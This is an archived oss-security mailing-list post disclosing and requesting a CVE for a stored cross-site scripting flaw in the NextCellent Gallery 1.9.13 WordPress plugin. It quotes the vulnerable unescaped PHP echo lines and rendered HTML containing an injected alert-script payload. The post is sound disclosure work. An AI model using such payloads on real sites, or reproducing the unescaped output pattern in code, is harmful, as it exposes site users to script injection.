|
Message-id: <0B442A5E-3A81-4448-B67F-9CE4E99D713D@me.com> Date: Wed, 30 Apr 2014 11:42:28 -0400 From: "Larry W. Cashdollar" <larry0@...com> To: Open Source Security <oss-security@...ts.openwall.com> Subject: Re: XSS in NextCellent Gallery 1.9.13 WordPress plugin Hi All, Sorry I should have been more clear, May I have a CVE assigned to this issue? Thanks! Larry C$ On Apr 27, 2014, at 8:56 AM, Larry W. Cashdollar <larry0@...com> wrote: > Title: XSS in NextCellent Gallery 1.9.13 WordPress plugin > Author: Larry W. Cashdollar, @_larry0 > Download: http://wpgetready.com/nextcellent-gallery/ > > Vendor Notified: 3/20/2014 > > CVE: Please assign one at your leisure. > > Vulnerability Fixed: 4/24/2014 in Nextcellent Gallery v1.19.18. > > > The user supplied data for the Alt & Title Text field isn't escaped before being printed out in the value field: > > Vulnerability: > From nextcellent-gallery-nextgen-legacy/admin/manage-images.php lines: > 503 <td <?php echo $attributes ? >> > 504 <input placeholder=" <?php _e("Alt & title text",'nggallery'); ?>" name="alttext[<?php echo $pid ?>]" type="text" style="width:95%; margin-bottom: 2px;" value="<?php echo stripslashes($picture->alttext) ?>" > 505 <textarea placeholder="<?php _e("Description",'nggallery'); ?>" name="description[<?php echo $pid ?>]" style="width:95%; margin: 1px;" rows="2" ><?php echo stripslashes($picture->description) ?></textarea> > 506 </td> > The HTML code produced is: > > <td class='alt_title_desc column-alt_title_desc'> <input placeholder="Alt & title text!" name="alttext[1]" type="text" style="width:95%; margin-bottom: 2px;" value=""><script>alert('hi')</script>"<" /><br/> <textarea placeholder="Description" name="description[1]" style="width:95%; margin: 1px;" rows="2" >"</a><script>alert('hi')</script><a>"</textarea> </td> > <td class='tags column-tags'><textarea placeholder="Separated by commas"name="tags[1]" style="width:95%;" rows="2"></textarea></td> <td class='exclude column-exclude'><input name="exclude[1]" type="checkbox" value="1" /></td> > > A screen shot is shown with the full advisory by following the link below. > > Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/nextCellent-gallery-1.9.13/
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.